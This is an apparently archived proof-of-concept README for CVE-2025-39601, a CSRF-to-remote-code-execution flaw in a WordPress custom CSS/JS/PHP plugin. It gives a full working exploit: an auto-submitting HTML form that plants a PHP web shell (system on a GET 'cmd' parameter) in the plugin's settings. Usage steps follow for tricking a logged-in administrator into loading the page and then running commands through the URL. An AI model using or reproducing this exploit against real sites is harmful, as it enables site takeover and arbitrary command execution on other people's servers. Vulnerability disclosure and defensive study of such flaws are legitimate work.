关联漏洞
Description
WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability
介绍
# 🚨 CVE-2025-39601 - CSRF to RCE in WordPress Custom CSS, JS & PHP plugin <= 2.4.1
## 🧠 Description
A **Cross-Site Request Forgery (CSRF)** vulnerability in the **WPFactory Custom CSS, JS & PHP** plugin allows for **Remote Code Execution (RCE)** by injecting malicious PHP code via unauthorized POST requests.
This affects all versions **up to and including 2.4.1**.
- **CVE ID:** CVE-2025-39601
- **Published:** 2025-04-16
- **Updated:** 2025-04-16
- **Severity:** 🔥 9.6 (CRITICAL)
- **CWE:** CWE-352 - Cross-Site Request Forgery
- **CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`
---
## 🖼️ Visual Proof
Below is a screenshot showing the result of a successful exploitation, demonstrating how remote code can be executed via the URL parameter:

---

---
## 💥 Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
<p>By : Nxploited | Khaled Alenazi</p>
<form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
<input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript><input type="submit" value="Submit"></noscript>
</form>
</body>
</html>
```
---
## 🧪 Usage
1. Host the above HTML file on any external server or local environment.
2. While an **admin user is logged in**, visit the hosted HTML file in their browser.
3. This will silently submit the form and inject PHP code into the plugin’s settings.
4. The code is then executed automatically on every page load via the `plugins_loaded` hook.
5. Example execution:
```
http://target-site.com/?cmd=whoami
```
---
## ⚠️ Disclaimer
This PoC is for **educational purposes only**.
The author is **not responsible for any misuse or damage** caused by improper application of this information.
Always test in controlled environments and with permission.
---
*By: Nxploited | Khaled Alenazi*
文件快照
[4.0K] /data/pocs/319b31f53eeb8e172c577db1890a2363dbf51d56
├── [ 46K] IMG2.png
├── [ 39K] img.png
├── [1.1K] LICENSE
└── [2.5K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。